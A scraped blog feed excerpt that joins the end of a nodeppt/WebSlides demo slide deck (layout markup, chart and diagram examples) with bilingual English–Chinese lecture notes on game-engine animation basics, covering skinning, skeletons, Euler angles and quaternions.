    :::{.content-right}

    ### 6/9 right top

    he rest of it went in a doublet of fine cloth and velvet breeches and shoes to match for holidays,

    `.content-right`


    <slide class="slide-bottom">
    :::{.content-left}

    ### 7/9 left bottom

    while on week-days he made a brave figure in his best homespun.

    `.slide-bottom` and `.content-left`


    <slide class="slide-bottom">
    :::{.content-center}

    ### 8/9 center bottom

    He had in his house a housekeeper past forty, a niece under twenty, and a lad for the field and market-place,

    `.slide-bottom` and `.content-center`

    <slide class="slide-bottom">
    :::{.content-right}

    ### 9/9 right bottom

    who used to saddle the hack as well as handle the bill-hook.

    `.slide-bottom` and `.content-right`

    <slide class="bg-black slide-bottom" image="https://source.unsplash.com/RSOxw9X-suY/">

    :::div {.content-left}
    :fa-tree large:

    ## 1,000,000

    ### We're working to protect up to a million acres of sustainable forest.

    :::


    <slide :class="size-50 aligncenter">

    ## Layout

    <slide :class="size-50">

    ### **What is Stendhal Syndrome?**

    Beauty overdose. `.text-pull-right` {.text-intro}

    Imagine that you are in Florence. If you suddenly start to feel that you literally cannot breathe, you may be experiencing Stendhal Syndrome.

    Psychiatrists have long debated whether it really exists. {.text-pull-right}

    The syndrome is not only associated with viewing a beautiful place, but also good art.

    The beauty of Italian art has a concentrated perfection and transcendent sensuality that is incredibly addictive.


    <slide>

    :::{.aligncenter}

    ### Simple CSS Alignments

    Put content wherever you want.
    :::

    :::footer
    Footer: logo, credits... (.alignleft) {.alignleft}

    [:fa-twitter: @username .alignright](){.alignright}

    :::

    :::header
    Header (logo) :.alignright:{.alignright}
    :::


    <slide :class="size-80 aligncenter">

    ## Prismjs for Code Highlight

    <slide :class="size-80">

    :::column {.vertical-align}

    ### **WebSlides is really easy**

    Each parent `<section>` in the #webslides element is an individual slide. {.text-intro}

    Code is neat, scalable, and well documented. It uses **intuitive markup with popular naming conventions**. There's no need to overuse classes or nesting. **Based on** [SimpleSlides](https://github.com/jennschiffer/SimpleSlides) , by [Jenn Schiffer](http://jennmoney.biz) :)

    ----

    ```html
    <article id="webslides">
    <!-- Slide 1 -->
    <section>
    <h1>Design for trust</h1>
    </section>
    <!-- Slide 2 -->
    <section class="bg-primary">
    <div class="wrap">
    <h2>.wrap = container (width: 90%) with fadein</h2>
    </div>
    </section>
    </article>
    ```

    :::

    ---

    Vertical sliding? `<article id="webslides" class="vertical">` {.aligncenter}


    <slide :class="size-80">

    Optional · 500+ icons {.text-subtitle}

    ## [:fa-flag: Font Awesome](http://fontawesome.io/icons/) as **SVG icons** {.animated.bounceIn}

    ```markdown
    :fa-flag:
    ```


    <slide :class="size-50 aligncenter">

    ## Quote

    <slide class="bg-black-blue" :class="size-60">

    > I have always appreciated designers who dare to reinterpret fabrics and proportions, so I follow the Japanese and Belgian designers.
    > ==Zaha Hadid==
    > {.text-quote}

    <slide image="https://webslides.tv/static/images/satya.png .left-bottom">

    :::div {.content-right}

    > "There is something only a CEO uniquely can do, which is set that tone, which can then capture the soul of the collective."
    > ==Satya Nadella, CEO of Microsoft.==
    > :::


    <slide>
    :::card {.quote}



    ![](https://webslides.tv/static/images/davinci.png)

    ---

    > “WebSlides helped us build a culture of innovation and excellence.”
    > ==Leonardo da Vinci==


    <slide class="aligncenter">

    ## Plugins

    <slide :class="size-60">

    ## echarts {.aligncenter}


    ```echarts {style="height:100%;width:100%;"}
    {
    tooltip: {
    trigger: 'item',
    formatter: "{a} <br/>{b}: {c} ({d}%)"
    },
    legend: {
    orient: 'vertical',
    x: 'left',
    data:['直达','营销广告','搜索引擎','邮件营销','联盟广告','视频广告','百度','谷歌','必应','其他']
    },
    series: [
    {
    name:'访问来源',
    type:'pie',
    selectedMode: 'single',
    radius: [0, '30%'],

    label: {
    normal: {
    position: 'inner'
    }
    },
    labelLine: {
    normal: {
    show: false
    }
    },
    data:[
    {value:335, name:'直达', selected:true},
    {value:679, name:'营销广告'},
    {value:1548, name:'搜索引擎'}
    ]
    },
    {
    name:'访问来源',
    type:'pie',
    radius: ['40%', '55%'],
    label: {
    normal: {
    formatter: '{a|{a}}{abg|}\n{hr|}\n {b|{b}:}{c} {per|{d}%} ',
    backgroundColor: '#eee',
    borderColor: '#aaa',
    borderWidth: 1,
    borderRadius: 4,
    // shadowBlur:3,
    // shadowOffsetX: 2,
    // shadowOffsetY: 2,
    // shadowColor: '#999',
    // padding: [0, 7],
    rich: {
    a: {
    color: '#999',
    lineHeight: 22,
    align: 'center'
    },
    // abg: {
    // backgroundColor: '#333',
    // width: '100%',
    // align: 'right',
    // height: 22,
    // borderRadius: [4, 4, 0, 0]
    // },
    hr: {
    borderColor: '#aaa',
    width: '100%',
    borderWidth: 0.5,
    height: 0
    },
    b: {
    fontSize: 16,
    lineHeight: 33
    },
    per: {
    color: '#eee',
    backgroundColor: '#334455',
    padding: [2, 4],
    borderRadius: 2
    }
    }
    }
    },
    data:[
    {value:335, name:'直达'},
    {value:310, name:'邮件营销'},
    {value:234, name:'联盟广告'},
    {value:135, name:'视频广告'},
    {value:1048, name:'百度'},
    {value:251, name:'谷歌'},
    {value:147, name:'必应'},
    {value:102, name:'其他'}
    ]
    }
    ]
    }

    ```

    <slide class="aligncenter">

    ## Plugins: mermaid

    <slide :class="size-60">

    ## Basic sequence diagram {.aligncenter}


    <pre class="mermaid">sequenceDiagram
    Alice ->> Bob: Hello Bob, how are you?
    Bob-->>John: How about you John?
    Bob--x Alice: I am good thanks!
    Bob-x John: I am good thanks!
    Note right of John: Bob thinks a long<br/>long time, so long<br/>that the text does<br/>not fit on a row.

    Bob-->Alice: Checking with John...
    Alice->John: Yes... John, how are you?</pre>



    <slide :class="size-60">

    ## Message to self in loop {.aligncenter}

    <pre class="mermaid">sequenceDiagram
    participant Alice
    participant Bob
    Alice->>John: Hello John, how are you?
    loop Healthcheck
    John->>John: Fight against hypochondria
    end
    Note right of John: Rational thoughts<br/>prevail...
    John-->>Alice: Great!
    John->>Bob: How about you?
    Bob-->>John: Jolly good!</pre>

    <slide :class="size-80">

    ## Gantt {.aligncenter}


    <pre class="mermaid">gantt
    dateFormat YYYY-MM-DD
    title Adding GANTT diagram functionality to mermaid

    section A section
    Completed task :done, des1, 2014-01-06,2014-01-08
    Active task :active, des2, 2014-01-09, 3d
    Future task : des3, after des2, 5d
    Future task2 : des4, after des3, 5d

    section Critical tasks
    Completed task in the critical line :crit, done, 2014-01-06,24h
    Implement parser and jison :crit, done, after des1, 2d
    Create tests for parser :crit, active, 3d
    Future task in critical line :crit, 5d
    Create tests for renderer :2d
    Add to mermaid :1d

    section Documentation
    Describe gantt syntax :active, a1, after des1, 3d
    Add gantt diagram to demo page :after a1 , 20h
    Add another diagram to demo page :doc1, after a1 , 48h

    section Last section
    Describe gantt syntax :after doc1, 3d
    Add gantt diagram to demo page :20h
    Add another diagram to demo page :48h</pre>

    <slide :class="size-60">

    ## Flowchart support for fontawesome {.aligncenter}

    <pre class="mermaid">graph TD
    B["fa:fa-twitter for peace"]
    B-->C[fa:fa-ban forbidden]
    B-->D(fa:fa-spinner);
    B-->E(A fa:fa-camera-retro perhaps?);</pre>

    <slide class="aligncenter">

    ## Plugins: KaTex

    <slide class="bg-gradient-v" :class="size-60">

    ## KaTex {.aligncenter}

    | equation | description |
    | ------------------------------------------------------------ | ------------------------------------------------------------ |
    | $\nabla \cdot \vec{\mathbf{B}} = 0$ | divergence of $\vec{\mathbf{B}}$ is zero |
    | $\nabla \times \vec{\mathbf{E}}\, +\, \frac1c\, \frac{\partial\vec{\mathbf{B}}}{\partial t} = \vec{\mathbf{0}}$ | curl of $\vec{\mathbf{E}}$ is proportional to the rate of change of $\vec{\mathbf{B}}$ |
    | $\nabla \times \vec{\mathbf{B}} -\, \frac1c\, \frac{\partial\vec{\mathbf{E}}}{\partial t} = \frac{4\pi}{c}\vec{\mathbf{j}} \nabla \cdot \vec{\mathbf{E}} = 4 \pi \rho$ | _wha?_ |



    <slide :class="size-50 aligncenter">

    ## Others

    <slide :class="size-80">

    ::: {.content-left}

    ## Button

    [.button](){.button} [.button.radius](){.button.radius}

    [.button.ghost](){.button.ghost} [:fa-github: svg-icon](){.button}
    :::

    ::: {.content-left}

    ## Avatar

    ![](https://avatars2.githubusercontent.com/u/1073262?s=40&v=4){.avatar-40}
    ![](https://avatars2.githubusercontent.com/u/1073262?s=40&v=4){.avatar-48}
    ![](https://avatars2.githubusercontent.com/u/1073262?s=40&v=4){.avatar-56}
    ![](https://avatars2.githubusercontent.com/u/1073262?s=40&v=4){.avatar-64}
    ![](https://avatars2.githubusercontent.com/u/1073262?s=40&v=4){.avatar-72}
    ![](https://avatars2.githubusercontent.com/u/1073262?s=40&v=4){.avatar-80}

    (80, 72, 64, 56, 48, and 40).
    :::

    <slide :class="aligncenter size-50">

    ## List

    ----

    * Niubility!
    * WebSlides
    * Webpack build in
    * Markdown-it
    * Posthtml
    * Prismjs

    <slide :class="size-50">

    ## Table

    | Left-aligned | Center-aligned | Right-aligned |
    | :----------- | :------------: | ------------: |
    | git status | git status | git status |
    | git diff | git diff | git diff |
    | git status | git status | git status |


    <slide class="bg-purple" :class="size-50 aligncenter" image="http://h1.ioliu.cn/bing/SandiaSunrise_ZH-CN11155504388_1920x1080.jpg .dark">

    ## Speaker Mode

    Click **Url + [?mode=speaker](./?mode=speaker){.bg-primary style="font-size:120%"}** to show Speaker Mode.

    <slide class="bg-primary" :class="size-60 frame">

    ## View More Demos? {.text-serif.aligncenter}

    \* \* \* {.text-symbols}

    <nav class="aligncenter">
    * [:fa-th-large: Layout](./layout.html)
    * [:fa-tv: Background](./background.html)
    * [:fa-magic: Animation](./animation.html)
    * [:fa-cube: Component](./component.html)
    * [:fa-youtube: Media](./media.html)
    {.no-list-style}


    </nav>

    <slide class="bg-black-blue aligncenter" image="https://cn.bing.com/az/hprichbg/rb/PragueChristmas_EN-AU8649790921_1920x1080.jpg .dark">

    ## U work so hard, **but** 干不过 write PPTs {.animated.tada}

    快使用 [nodeppt](https://github.com/ksky521/nodeppt) 轻松搞定高大上 PPT<br/> nodeppt 助力你的人生逆袭之路!{.text-into.animated.delay-800.fadeIn}

    [:fa-cloud-download: Github](https://github.com/ksky521/nodeppt){.button.animated.delay-1s.fadeInUp}

    ​编译 index.md 生成静态 HTML 文件:

    1
    nodeppt build test.md

    ​在本地服务器上浏览 index.md

    1
    nodeppt serve test.md
    ]]>
    @@ -1861,7 +1861,7 @@ /posts/GAMES104-Animation/ - 资源

    课程

    第八节:游戏引擎的动画技术基础

    Animation System

    Basics of Animation Technology

    Humans have been trying to represent object in motion

    ​人类一直在尝试表现运动中的物体

    webp

    webp

    • The persistence of vision

      视觉暂留

    • lllusory motion

      虚幻的运动

    webp

    Animation Techniques in Film

    ​动画产业最早从电影兴起。

    webp

    webp

    • Hand Draw Animation

      手绘动画

    • Cel Animation

      赛璐珞动画

    ​Cel animation 是一种传统的动画制作技术,也被称为传统动画。它是通过在透明的塑料或树脂片上手绘动画角色和背景,然后将它们叠加在一起,逐帧拍摄来制作动画。这种技术在过去几十年一直被广泛应用,直到计算机动画技术的出现。

    • Computer Animation

      计算机动画

    Animation Techniques in Game

    webp

    ​最早的游戏动画来自 2D。Doom 是一个用 2D 技术做的 3D 效果的游戏。

    webp

    • Rigid Hierachy Animation

      刚性层阶式动画,容易穿模

    • Soft Skinned Animation

      蒙皮动画

    • Physics Animation

      物理动画

    Challenges in Game Animation (1/3)

    webp

    Interactive and dynamic animation

    ​互动和动态动画

    • Vary according to the interaction

      根据互动而变化

    • Cooperate with other gameplay systems

      与其他游戏系统配合

    • Make adjustments in complex environments

      在复杂环境下进行调整

    Challenges in Game Animation (2/3)

    webp

    Real-time

    • Compute per frame

      逐帧计算(在一帧内完成所有计算)

    • Massive animation data (Disk and memory)

      海量动画数据(磁盘和内存)

    Challenges in Game Animation (3/3)

    Realism

    ​现实主义

    • More vivid expression

      更生动的表达

    • More authentic experience

      更真实的体验

    webp

    • Facial Animation

      面部动画

    • Ragdoll Physics

      布娃娃物理

    • Motion Matching

      运动匹配

    Outline of Animation System

    • Basics of Animation Technology

      动画技术基础

      2D Animation

      2D 动画

      3D Animation

      3D 动画

      Skinned Animation lmplementation

      蒙皮动画实现

      Animation Compression

      动画压缩

      Animation DCC

    ​动画 DCC 是指动画数字内容创建(Digital Content Creation)工具,通常是指用于制作电影、电视、游戏和其他数字媒体内容的软件套件。这些工具能够帮助动画师和艺术家制作、编辑和渲染动画和视觉效果,从而实现各种复杂和精细的动画效果。

    • Advanced Animation Technology

      先进的动画技术

      Animation Blend

      动画混合

      Inverse Kinematics

      逆运动学

      Animation Pipeline

      动画管线

      Animation Graph

      动画图

      Facial Animation

      面部动画

      Retargeting

      重定向

    2D Animation lechnigues in Games

    2D Animation-Sprite animation

    webp

    The electronic equivalent to cel animation

    ​相当于赛璐珞动画的电子版

    • A sprite is a small bitmap that can be overlaid on top of a background image without disrupting it

      精灵是一个小位图,可以覆盖在背景图像之上而不破坏它

    • The sequence of frames was designed so that it animates smoothlyeven when it is repeated indefinitely

      帧序列经过精心设计,即使无限重复,动画也能流畅进行

    The Sprite-like animation technique in pseudo-3D game

    ​伪 3D 游戏中的类精灵动画技术

    webp

    ​用 2D 画出 3D 中各个视角的图片。

    Sprite Animation in Modern Game

    webp

    Application

    ​应用

    • 2D character

      2D 角色

      • Sprite on 2D background image

        2D 背景图像上的精灵

      • Sprite on top of 3D rendered environment

        3D 渲染环境之上的精灵

    • Game effect

      游戏效果

      • Sprite sheet texture for particles

        粒子的精灵片纹理

    Live2D

    webp

    A technology to generate 2D animation without 3D model

    ​一种无需 3D 模型即可生成 2D 动画的技术

    • Usually refer to eponymous software series epmloying the technology created by Live2D Ltd.

      通常指采用 Live2D Ltd. 创建的技术的同名软件系列。

    • Could develop dynamic character, especially anime-style character without a 3D model

      无需 3D 模型即可开发动态角色,尤其是动漫风格的角色

    webp

    • By applying translation, rotation and transformation to different parts and layers of image.

      通过对图像的不同部分和图层应用平移、旋转和变换。

    • Combined with real-time motion capture, could be used for vtubing

      结合实时动作捕捉,可用于 vtubing

    webp

    Make a Live2D animation

    ​制作 Live2D 动画

    Prepare resources

    ​准备资源

    • Dividing origin character image into different parts

      将原始角色图像分为不同的部分

    • Set “draw order” to each parts for further use

      为每个零件设置“绘制顺序”以供进一步使用

    webp

    Make a Live2D animation

    ​制作 Live2D 动画

    Transform image by using control points for parts

    ​使用零件的控制点变换图像

    • “ArtMesh” could be automately generated for each parts, which defined by vertices, edges and polygons

      可以为每个部分自动生成“ArtMesh”,由顶点、边和多边形定义

    • Control points could be used to help transforming "ArtMesh’

      控制点可用于帮助改造“ArtMesh”

    webp

    Make a Live2D animation

    ​制作 Live2D 动画

    Set animation “key frame”

    ​设置动画“关键帧”

    • Set “key frame” to help animation interpolation

      设置“关键帧”以帮助动画插值

    3D Animation lechnigues in Games

    DoF (Degrees of Freedom)

    webp

    • refers to the number of independent variables or parameters of a system

      指系统的自变量或参数的数量

    DoF For rigid objects

    ​DoF 对于刚性物体

    webp

    • 6 DoFs per object or sub-part

      每个对象或子部分有 6 个自由度

    Rigid Hierarchical Animation

    ​刚性层阶式动画

    webp

    • The earliest approach to 3D character animation

      最早的 3D 角色动画方法

    • A character is modeled as a collection of rigid pieces

      角色被建模为刚性部件的集合

    • The rigid pieces are constrained to one another in a hierarchical fashion

      刚性部件以分层方式相互约束

    Per-vertex Animation

    ​顶点动画

    webp

    ​与蒙皮动画相比,顶点动画更适合模拟流体或是布匹。

    • Most flexible (3 DoFs per vertex)

      最灵活(每个顶点 3 个自由度)

    • Mostly implemented by Vertex Animation Texture (VAT)

      主要由顶点动画纹理(VAT)实现

    • Suitable for complex morphing

      适用于复杂的变形

    • Need massive data

      需要海量数据

    Morph Target Animation

    webp

    • A variation on Per-vertex Animation

      每个顶点动画的变体

      • Use key frames with LERP instead of sequence frames(e.g. 30 frames per second

        使用带有 LERP 的关键帧而不是序列帧(例如每秒 30 帧)

    • Suitable for facial expression

      适合面部表情

    3D Skinned Animation

    webp

    • Mesh (or skin) is bound to the joints of the skeleton

      网格(或皮肤)绑定到骨骼的关节

    • Each vertex can be weighted to multiple joints

      每个顶点可以加权到多个关节

    Advantages

    ​优点

    • Need less data than per-vertex animation

      比逐顶点动画需要更少的数据

    • Mesh can be animated in a natural way (like human “skin”)

      网格可以以自然的方式进行动画处理(就像人类的“皮肤”)

    2D Skinned Animation

    webp

    Derived from 3D skinned animation

    ​源自 3D 蒙皮动画

    • Break up character into various body parts

      将角色分解为不同的身体部位

    • Create body part meshes and piece them together

      创建身体部位网格并将它们拼凑在一起

    • Rigging, skinning and animation

      绑定、蒙皮和动画

    Physics-based Animation

    webp

    • Ragdoll

      布娃娃

    • Cloth and Fluid simulation

      布料和流体模拟

    • Inverse Kinematics (IK)

      逆运动学 (IK)

    Animation Content Creation

    webp

    ​动画内容创作方式:

    • Digital Content Creator + Animator

      数字内容创作者 + 动画师

    • Motion Capture

      动作捕捉

    Skinned Animationimp lementation

    ​蒙皮动画实现

    webp

    How to Animate a Mesh

    ​如何制作网格动画

    1. Create mesh for a binding pose

      为绑定姿势创建网格

    2. Create a binding skeleton for the mesh

      为网格创建绑定骨架

    3. “Paint” per-vertices skinning weights to related skeleton

      将每个顶点蒙皮权重“绘制”到相关骨架

    4. Animate skeleton to desired pose

      将骨骼动画化为所需的姿势

    5. Animate skinned vertices by skeleton and skinning weights

      通过骨架和蒙皮权重对蒙皮顶点进行动画处理

    Different Spaces

    webp

    ​要考虑三个坐标系:

    • Local space, Model space and World space

      局部坐标,模型坐标和世界坐标

    Skeleton for Creatures

    ​生物骨骼

    webp

    Comprised of a hierarchy of rigid pieces known as joints

    ​由称为关节的刚性部件的层次结构组成

    • One joint is selected as the root

      选择一个关节作为根

    • Every joint has a parent joint except the root

      除根关节外,每个关节都有一个父关节

    Joint vs. Bone

    ​关节和骨骼

    webp

    • The joints are the objects directly manipulated by the animator to control motion

      关节是动画师直接操纵以控制运动的对象

    • The bones are the empty space between the joints

      骨头是关节之间的空隙

    Humaniod Skeleton in Real Game

    ​真实游戏中的人形骨骼

    webp

    Number of joints in a humaniod skeleton

    ​人形骨骼中的关节数量

    • Normal: 50~100 joints

      正常:50~100 个关节

    • May more than 300+ joints includefacial joints and gameplay joints

      可能超过 300+ 关节,包括面部关节和游戏关节

    Joints for Game Play

    webp

    • Additional joints

      附加关节

    • Weapon joint

      武器关节

    • Mount joint

      安装接头

    Where to Start the Skeleton - Root Joint

    ​一般都是髋关节做 Pelvis joint,脚底中心作 Root joint

    webp

    Root joint

    ​根关节

    • The center of the feet

      脚的中心

    • Convenient to touch the ground

      方便接触地面

    Pelvis joint

    ​骨盆关节

    • The first child joint of the root joint

      根关节的第一个子关节

    • Human upper and lower body separation

      人体上下半身分离

    How to Handle Horse Skeleton?

    webp

    ​一般把马的 Pelvis joint 和 Root joint 放置在如图位置。

    Bind Animation for Objects

    ​为对象绑定动画

    webp

    Attach two skeleton’s bind point

    ​连接两个骨架的绑定点

    Bind Pose-T-pose vs. A-pose

    ​绑定姿势-T 姿势与 A 姿势

    webp

    The pose of the 3D mesh prior to being bound to the skeleton

    ​3D 网格在绑定到骨架之前的姿势

    • Keep the limbs away from the body and each other, making the process of binding the vertices to the joints easier

      使四肢远离身体和彼此,使将顶点绑定到关节的过程更容易

    • Usually close to natural pose

      通常接近自然姿势

    T-pose vs A-pose

    • Shoulders in A-pose are more relaxed

      A 字式的肩膀更加放松(T 字式的肩膀容易挤压导致扭曲,所以现在更偏好 A 字式)

    • Easy to defarmating in A-pose

      轻松以 A 姿势解除武装(?)

    Skeleton Pose

    Skeleton Pose: A skeleton is posed by transform its joints from the bind pose

    ​骨骼姿势:通过从绑定姿势变换其关节来摆出骨骼姿势

    webp

    Joint Pose (9 DoFs)

    ​关节姿势(9 个自由度)

    • Orientation (3 DoFs)

      方向(3 个自由度)

    • Position (3 DoFs)

      位置(3 个自由度)

    • Scale (3 DoFs)

      比例(3 个自由度)

    Math of 3D Rotation

    2D Orientation Math

    webp

    ​2D 旋转用一个 $\alpha$ 来表示很简单。

    3D Orientation Math

    Euler Angle

    ​用欧拉角来表示三维旋转。

    • 3D-Rotation by single axis

      以 $x,y,z$ 某个轴旋转 $\alpha,\beta,\gamma$

    webp

    • 3D-Rotation combined by $x, y, z$ axis sequentially

      由 $x, y, z$ 轴顺序组合的 3D 旋转

    webp

    Euler Angle

    Euler Angle provides a brief description of 3D rotation and is widely used in many fields

    ​欧拉角提供了 3D 旋转的简要描述,广泛应用于许多领域

    webp

    • Yaw angle:$\psi$ 飞机左右转弯
    • Pitch angle:$\theta$ 飞机抬头低头
    • Roll angle:$\phi$ 飞机左右倾斜

    Order Dependence on Euler Angle

    ​欧拉角的阶次依赖性

    webp

    ​欧拉角旋转看上去直观,但是旋转次序将会影响最终的旋转效果。

    Gimbal Lock

    ​万向节锁

    webp

    ​Gimbal Lock 是三维空间中的一个现象,通常发生在使用欧拉角(Euler Angles)描述物体旋转时,尤其是在使用万向节(Gimbal)结构进行旋转时。这个现象会导致失去一个旋转自由度,使得物体在某些情况下无法继续按预期旋转。

    ​为了理解 Gimbal Lock,首先需要了解欧拉角和万向节结构。

    欧拉角是一种描述物体旋转的方法,通过三个轴(通常是 X、Y、Z 轴)的旋转角度来表示物体的方向。然而,当旋转过程中某两个轴对齐时,就会发生 Gimbal Lock。

    ​万向节是一种机械结构,由多个轴构成,每个轴都可以绕自己的轴旋转。但当其中两个轴对齐时,就会发生 Gimbal Lock,因为这会使得第三个轴失去了自由度。

    ​具体来说,当两个轴对齐时,旋转操作将不再在三个轴的独立空间内进行,而是会导致旋转操作影响到其他轴,从而导致无法预期的结果。这使得物体在某些情况下无法继续自由旋转,因为其中一个轴的旋转将会影响到其他轴的方向,导致失去了自由度。

    ​为了避免 Gimbal Lock,可以使用其他方法来描述旋转,如四元数(Quaternions),它们不会受到 Gimbal Lock 的限制。此外,在使用欧拉角时,可以采用一些技巧和限制来尽量避免 Gimbal Lock 的发生。

    Degeneration of Euler Angle

    ​欧拉角退化

    webp

    Problems of Euler Angle

    ​欧拉角问题

    webp

    Rotation Combination

    ​旋转结合

    webp

    Rotation By Certain Axis

    ​按特定轴旋转


    • Gimbal Lock

      万向节锁

      Gimbal Lock occurs because of the loss of one DoF

      由于失去一个自由度而发生万向节锁定

    • Hard to interpolate

      难以插值

      Singularity problem make it hard to interpolate

      奇点问题使得插值变得困难

    • Difficult for rotation combination

      旋转组合困难

      Rotation combination need rotation matrix

      旋转组合需要旋转矩阵

    • Hard to rotate by certain axis

      难以按特定轴旋转

      Easy to rotate by $x,y,z$ axis but hard to others

      很容易通过 $x$、$y$、$z$ 轴旋转,但对其他人来说很难

    Quaternion

    ​四元数用于表示旋转。

    ​它们结构紧凑,不受万向锁影响,可以轻松插值。 Unity 内部使用四元数来表示所有旋转。

    ​它们基于复数,不容易理解。 您几乎不会有机会访问或修改单个四元数分量($x$、$y$、$z$、$w$); 大多数情况下,您只需要获取现有旋转(例如,来自 Transform),然后使用它们构造新的旋转 (例如,在两个旋转之间平滑插值)。 您绝大多数时间使用的四元数函数为: Quaternion.LookRotationQuaternion.AngleQuaternion.EulerQuaternion.SlerpQuaternion.FromToRotationQuaternion.identity。(其他函数仅用于一些十分奇特的用例。)

    引入四元数解决万向节锁的问题。

    webp

    Every morning in the early part of October 1843, on mycoming down to breakfast, your brother William Edwin and yourself used to ask me: “Well, Papa, can you multiply triples?” Whereto I was always obliged to reply, with a sad shake of the head, "No, Ican onlyadd and subtract them.

    ​1843 年 10 月上旬,每天早上,当我下楼吃早餐时,你的兄弟威廉·埃德温和你自己都会问我:“爸爸,你能乘以三倍吗?”对此,我总是不得不悲伤地摇头回答:“不,我只能加减它们。

    Complex Number and 2D Rotation

    ​引入复数概念探讨 2D 旋转问题。

    Complex Number

    • Definition

      $c=a+bi\ (a,b\in\mathbb{R})$

      $i^2=-1$

    • Represent as Vector

      $c=\begin{bmatrix}a\b\end{bmatrix}$

    • Product

      $c_1=a+bi\quad c_2=c+d_i\quad c_1c_2=\begin{bmatrix}a&-b\b&a\end{bmatrix}\begin{bmatrix}c\d\end{bmatrix}$

    webp

    ​对于角 $\alpha$ 用 $z=a+bi$ 表示,角 $\beta$ 用 $w=c+di$ 表示,则 $\alpha+\beta$ 可以用 $zw=(a+bi)(c+di)$ 表示。

    Quaternion

    类比与 2D,用四元数表示三维的旋转。

    Quaternion

    • Definition

      $q=a+bi+cj+dk\quad(a,b,c,d\in\mathbb{R})\i2=j2=k^2=ijk=-1$

    • Represent as two parts pair (real number and vector)

      表示为两部分对(实数和向量)

      $q=(a,v)\quad(v=\begin{bmatrix}b\c\d\end{bmatrix},a,b,c,d\in\mathbb{R})$

    • Product

      $q_1=a+bi+cj+dk\q_2=e+fi+gj+hk\q_1q_2=\begin{bmatrix}a&-b&-c&-d\b&a&-d&c\c&d&a&-b\d&-c&b&a\end{bmatrix}\begin{bmatrix}e\f\g\h\end{bmatrix}$

      用 $q_1q_2$ 表示先旋转 $q_1$ 再旋转 $q_2$

    • Norm

      $||q||=\sqrt{a2+b2+c2+d2}$

    • Conjugate

      共轭

      $q^*=a-bi-cj-dk$

    • Inverse

      $q{-1}q=qq{-1}=1$

    Euler Angle to Quaternion

    webp

    $$q=[1\quad i\quad j\quad k]\begin{bmatrix}\cos(\gamma/2)\cos(\beta/2)\cos(\alpha/2)+\sin(\gamma/2)\sin(\beta/2)\sin(\alpha/2)\\sin(\gamma/2)\cos(\beta/2)\cos(\alpha/2)-\cos(\gamma/2)\sin(\beta/2)\sin(\alpha/2)\\cos(\gamma/2)\sin(\beta/2)\cos(\alpha/2)+\sin(\gamma/2)\cos(\beta/2)\sin(\alpha/2)\\cos(\gamma/2)\cos(\beta/2)\sin(\alpha/2)-\sin(\gamma/2)\sin(\beta/2)\cos(\alpha/2)\end{bmatrix}$$

    Rotation by Quaternion

    Quaternion

    • Vector to quaternion

      • A 3D vector $\mathbf v$ could be written inquaternion format as follow:

        $v_q=(0,v)=bi+cj+dk\quad v=\begin{bmatrix}b\c\d\end{bmatrix}$

    • Rotation

      $v_q{\prime}=qv_qq*=qv_qq^{-1}$

    $$q^*=a-bi-cj-dk$$

    $$q_1=a+bi+cj+dk\q_2=e+fi+gj+hk\q_1q_2=\begin{bmatrix}a&-b&-c&-d\b&a&-d&c\c&d&a&-b\d&-c&b&a\end{bmatrix}\begin{bmatrix}e\f\g\h\end{bmatrix}$$

    Quaternion to Rotation Matrix

    $$\begin{aligned}&q=(a,b,c,d)\quad||q||=1\&v{\prime}=\begin{bmatrix}1-2c2-2d2&2bc-2ad&2ac+2bd\2bc+2ad&1-2b2-2d2&2cd-2ab\2bd-2ac&2ab+2cd&1-2b2-2c^2\end{bmatrix}v\end{aligned}$$

    Rotation wath by Quaternion

    Inverse Resolving

    ​逆旋转

    webp

    $$q{-1}=\frac{q*}{||q||^2}$$

    Rotation Combination

    ​复合旋转

    webp

    $$\begin{aligned}
    q_1*q_2&=(q_2q_1)^ \
    v{\prime}&=q_1vq_1* \
    v{\prime\prime}&=q_2v{\prime}q_2^* \
    &=q_2q_1vq*_1q_2 \
    &=(q_2q_1)v(q_2q_1)^

    \end{aligned}$$

    Quaternion between Two Unit Vectors

    ​两个单位向量之间的四元数

    webp
    $$
    w=u\times v \
    q=[u\cdot v+\sqrt{(w\cdot w)+(u\cdot v)^2},w] \
    (||u||=||v||=1)
    $$

    Given Axis Rotation by Quaternion

    Quaternion

    webp

    • Vector to quaternion

      向量到四元数

      • A 3D vector $\mathbf v$ could be written in quaternion format as follow:

        3D 向量 $\mathbf v$ 可以写成四元数格式,如下所示:

        $v_q=(0,v)=bi+cj+dk\quad v=\begin{bmatrix}b\c\d\end{bmatrix}$

    • Rotation

      • For vector $\mathbf v$, rotated by unit axis $u$ of angle $\theta$, the result vector $v’_q$

        对于向量 $\mathbf v$,按角度 $\theta$ 的单位轴 $u$ 旋转,结果向量 $v’_q$

    $$q=(\cos(\frac\theta2),\sin(\frac\theta2)x_u,\sin(\frac\theta2)y_u,\sin(\frac\theta2)z_u)$$

    $$v’_q=qv_qq*=qv_qq{-1}$$

    $u=\begin{bmatrix}x_u\y_u\z_u\end{bmatrix}$ is a unit vector represents rotation axis

    $u=\begin{bmatrix}x_u\y_u\z_u\end{bmatrix}$ 是表示旋转轴的单位向量

    Joint Pose

    ​关节动作

    Joint Pose - Orientation

    ​关节姿势 - 方向

    webp

    • Rotation -> Change the Orientation of joints

      旋转 -> 更改关节方向

    • Most skeleton poses change orientations of joints only

      大多数骨骼姿势仅改变关节的方向

    Joint Pose - Position

    webp

    • Translate ->change postion

      变换->改变位置

    • Translate point $P$ to point $P’$ by vector $T$

      通过向量 $T$ 将点 $P$ 变换为点 $B’$

    webp

    • Usually not changed in humanoid skeleton except the pelvis, facial joint and other special joints

      人形骨骼除骨盆、面部关节等特殊关节外通常不发生改变

    • Used for stretching models

      用于拉伸模型

    Joint Pose - Scale

    webp

    • Scale -> change the size of the model

      缩放 -> 更改模型的大小

    • Uniform vs. Non-uniform Scale

      均匀比例与非均匀比例

    webp

    • Widely used in facial animation

      广泛应用于面部动画

    • Uniform and non-uniform scale facial ioints

      均匀和不均匀比例的面部关节

    Joint Pose - Affine Matrix

    webp

    ​将变换旋转缩放用一个仿射矩阵表示。

    Joint Pose-Local Space to Model Space

    ​联合姿势局部空间到模型空间

    webp

    For a joint $j$ in a skinned mesh

    ​对于蒙皮网格中的关节 $j$

    • $p(j)$ : Joint $j$'s parent joint

      $p(j)$ :关节 $j$ 的父关节

    • $M’_{p(j)}$ : Joint $j$'s parent joint pose in local space

      $M’_{p(j)}$ :关节 $j$ 的父关节在局部空间中的姿势

    $M^m_J$ : joint $J$'s pose in model space

